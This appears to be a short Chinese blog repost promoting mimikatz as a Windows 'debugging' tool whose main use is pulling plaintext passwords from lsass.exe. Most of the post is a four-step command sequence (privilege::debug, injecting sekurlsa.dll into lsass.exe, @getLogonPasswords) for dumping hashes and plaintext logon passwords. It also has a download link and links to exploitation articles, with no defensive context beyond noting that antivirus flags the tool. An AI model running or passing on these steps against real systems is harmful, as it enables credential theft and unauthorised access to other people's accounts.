最近网上有一个很火的的工具：mimikatz被誉为：windows下轻量级调试神器
我到我测试后是没有成功，但是又网友测试成功。
收获是发现了一个外国人的博客：官网:http://blog.gentilkiwi.com/mimikatz
有时间翻译着看看吧！是有好处的！
-----------------------------

mimikatz是一款windows平台下的神器，它具备很多功能，其中最亮的功能是直接从 lsass.exe 里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此，它还可以提升进程权限 注入进程 读取进程内存等等，mimikatz包含了很多本地模块，更像是一个轻量级的调试器，其强大的功能还有待挖掘。

使用方法：
1. 运行主程序：mimikatz.exe
2. 输入：privilege::debug      提升权限
3. 输入：inject::process lsass.exe sekurlsa.dll   
     将sekurlsa.dll  注入到lsass.exe 中
4. 输入：@getLogonPasswords
   即可获取hash和当前用户的明文密码！

注：该工具，杀软会报毒。

下载地址：http://115.com/file/e7lk679q#mimikatz_trunk.zip

官网:http://blog.gentilkiwi.com/mimikatz

相关利用文章:
http://hi.baidu.com/hackercasper ... b6a5cc562c8461.html
http://hi.baidu.com/%CE%E9%D7%D3 ... e5c73006088be7.html